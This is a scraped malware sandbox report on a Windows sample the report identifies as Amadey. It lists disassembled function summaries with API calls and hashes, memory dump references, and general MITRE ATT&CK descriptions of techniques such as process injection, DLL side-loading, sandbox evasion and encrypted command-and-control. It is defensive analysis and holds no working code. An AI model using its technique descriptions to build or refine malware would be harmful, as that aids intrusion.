Opcode Fuzzy Hash: d18512388ffd342288df39428cbfcd5e8d75cc57469327d656fa976045054efc
Instruction Fuzzy Hash: 2EF036352002A5BBCB205FA7DC08D96FF69FF457A03044511F919C7121D731EA60D7E0

Function 00CF734A Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,00000000,?,00CF3E32,00000000,00000001,00000000,00000000,?,00CE7996,?,?,00000000), ref: 00CF7361
GetLastError.KERNEL32(?,00CF3E32,00000000,00000001,00000000,00000000,?,00CE7996,?,?,00000000,?,00000000,?,00CE7EE2,8B18EC83), ref: 00CF736D

Part of subcall function 00CF7333: CloseHandle.KERNEL32(FFFFFFFE,00CF737D,?,00CF3E32,00000000,00000001,00000000,00000000,?,00CE7996,?,?,00000000,?,00000000), ref: 00CF7343

___initconout.LIBCMT ref: 00CF737D

Part of subcall function 00CF72F5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CF7324,00CF3E1F,00000000,?,00CE7996,?,?,00000000,?), ref: 00CF7308

WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,?,00CF3E32,00000000,00000001,00000000,00000000,?,00CE7996,?,?,00000000,?), ref: 00CF7392

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9c3f41f801d97bf94589b487d7a6a9744789d15a2d377cecf9182c2b35add1e6
Instruction ID: 144d39f119c24ec60373f24ca54f17d4999793d472df9d3e3459a4497f8b2c6f
Opcode Fuzzy Hash: 9c3f41f801d97bf94589b487d7a6a9744789d15a2d377cecf9182c2b35add1e6
Instruction Fuzzy Hash: E7F0A23A50525ABBCF622F95DD05ADD3F67EB04361B044114FE5CD5630DA319920EBA1

Function 00CD99BA Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNEL32(?,00CD9957,00000064,?,00CB8A41,00D1CDC0), ref: 00CD99DD
LeaveCriticalSection.KERNEL32(00D18FA8,00D1CDC0,?,00CD9957,00000064,?,00CB8A41,00D1CDC0), ref: 00CD99E7
WaitForSingleObjectEx.KERNEL32(00D1CDC0,00000000,?,00CD9957,00000064,?,00CB8A41,00D1CDC0), ref: 00CD99F8
EnterCriticalSection.KERNEL32(00D18FA8,?,00CD9957,00000064,?,00CB8A41,00D1CDC0), ref: 00CD99FF

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 9d1688536b689691f133a7e7a499cb437eda191e2c9c89c12b001a99de4dda66
Instruction ID: d43fd289006390770f23d8097bd8c34efd9563dae56b529508e25dfa95a021b7
Opcode Fuzzy Hash: 9d1688536b689691f133a7e7a499cb437eda191e2c9c89c12b001a99de4dda66
Instruction Fuzzy Hash: E0E0ED3A545324BBCA115B51FC09BCD3A16EF49762B004015F60DA6360CF715952ABF5

Function 00CE4559 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CE4562

Part of subcall function 00CE8006: HeapFree.KERNEL32(00000000,00000000,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?), ref: 00CE801C
Part of subcall function 00CE8006: GetLastError.KERNEL32(?,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?,?), ref: 00CE802E

_free.LIBCMT ref: 00CE4575
_free.LIBCMT ref: 00CE4586
_free.LIBCMT ref: 00CE4597

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 08b29436397338af15c9246a9b3f74d6742caca6b751468188a041b8f6077fad
Instruction ID: e39d6aac4883efba92e8270ceb1d33967ffbc39f2e06efd5ea403067257e2201
Opcode Fuzzy Hash: 08b29436397338af15c9246a9b3f74d6742caca6b751468188a041b8f6077fad
Instruction Fuzzy Hash: 07E09AB5C15360BE8A216F26AC318C5BA22A748750301940AF41DA6331DF39055BBFB6

Function 00CE32BD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00CE334D

Strings

pow, xrefs: 00CE3325, 00CE3342

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 60784d5d9b464b55a2784300eb4513a4e98c8bbf8f81a11675abdac8ec91044e
Instruction ID: 97b66fdefcab376c2c770eaa40d6d251b7ab0252693035ef7a5d99f8eafd60db
Opcode Fuzzy Hash: 60784d5d9b464b55a2784300eb4513a4e98c8bbf8f81a11675abdac8ec91044e
Instruction Fuzzy Hash: 9051AF60A082C196CB02B717D90977E6BA0EB00750F204D59E4E6873FDDF749FC6AA56

Function 00CE39C2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\6uHfmjGMfL.exe, xrefs: 00CE3A05, 00CE3A0C, 00CE3A42

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\6uHfmjGMfL.exe
API String ID: 0-3138345258
Opcode ID: 82bd7be94f5c56891264cbc1d7abbac31d8c404bffd6579dbd35258a6a9117ab
Instruction ID: 7134738970c6a9f522897db42ffc66519a0681502a8142abc2ea02f3abdc81db
Opcode Fuzzy Hash: 82bd7be94f5c56891264cbc1d7abbac31d8c404bffd6579dbd35258a6a9117ab
Instruction Fuzzy Hash: D041A471A002D4AFDB21DF9BDC869AEBBB8EB84700F144076E455D7201DB70AB81EB60

Function 00CDCF1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CDCF41

Strings

RCC, xrefs: 00CDCF5B
MOC, xrefs: 00CDCF53

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: db210e72e8ae882c8f51a54875681ce104f465aa3ff1818839b691b29cbf48ea
Instruction ID: 210d64321b70a6df7e1ee06355b5a5c2a9c97ddf0d771474fdbf8d36dcaca6fd
Opcode Fuzzy Hash: db210e72e8ae882c8f51a54875681ce104f465aa3ff1818839b691b29cbf48ea
Instruction Fuzzy Hash: 5E416871D00209AFCF16DFA8CC81EEEBBB5BF88300F19805AFA15A7251D335AA51DB50

Function 00CB44C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00CB44EB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00CB453A

Part of subcall function 00CD879E: _Yarn.LIBCPMT ref: 00CD87BD
Part of subcall function 00CD879E: _Yarn.LIBCPMT ref: 00CD87E1

Strings

bad locale name, xrefs: 00CB4556

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: cda2a8bf88f1b6c0863a39f5cacea07638e0ea8400bf9fd3126d174f7c0d3b1d
Instruction ID: ca5052bffa505d5e1be2dab6b2bed194364ef801237f4b0c4fe7d8df60bf45ff
Opcode Fuzzy Hash: cda2a8bf88f1b6c0863a39f5cacea07638e0ea8400bf9fd3126d174f7c0d3b1d
Instruction Fuzzy Hash: 1A11A071505B84AFD320CF68C901757BBF4EF19710F008A1EE49AC7B81E7B5AA08CBA5

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6uHfmjGMfL.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
6uHfmjGMfL.exe

Function 00CBE8D0 Relevance: 25.3, APIs: 7, Strings: 7, Instructions: 764
comCOMMON

Function 00CB93D0 Relevance: 18.0, APIs: 6, Strings: 4, Instructions: 473
libraryloaderCOMMON

Function 00CEE7DE Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 330
timeCOMMON

Function 00CB91B0 Relevance: 6.3, APIs: 4, Instructions: 324
libraryloaderCOMMON

Function 00CC05B0 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 312
networkfilesleepCOMMON

Function 00CEEA7F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
timeCOMMON

Function 00CB9A20 Relevance: 7.7, APIs: 5, Instructions: 155
libraryloaderCOMMON

Function 00CE065C Relevance: 7.6, APIs: 5, Instructions: 141
pipeCOMMON

Function 00CBC6D0 Relevance: 6.0, APIs: 4, Instructions: 36
sleepsynchronizationCOMMON

Function 00CEEBD9 Relevance: 4.6, APIs: 3, Instructions: 83
COMMON

Function 00CE04F4 Relevance: 3.1, APIs: 2, Instructions: 87
COMMON

Function 00CE07CC Relevance: 3.1, APIs: 2, Instructions: 54
timeCOMMON

Function 00CD0C00 Relevance: 3.0, APIs: 2, Instructions: 23
sleepthreadCOMMON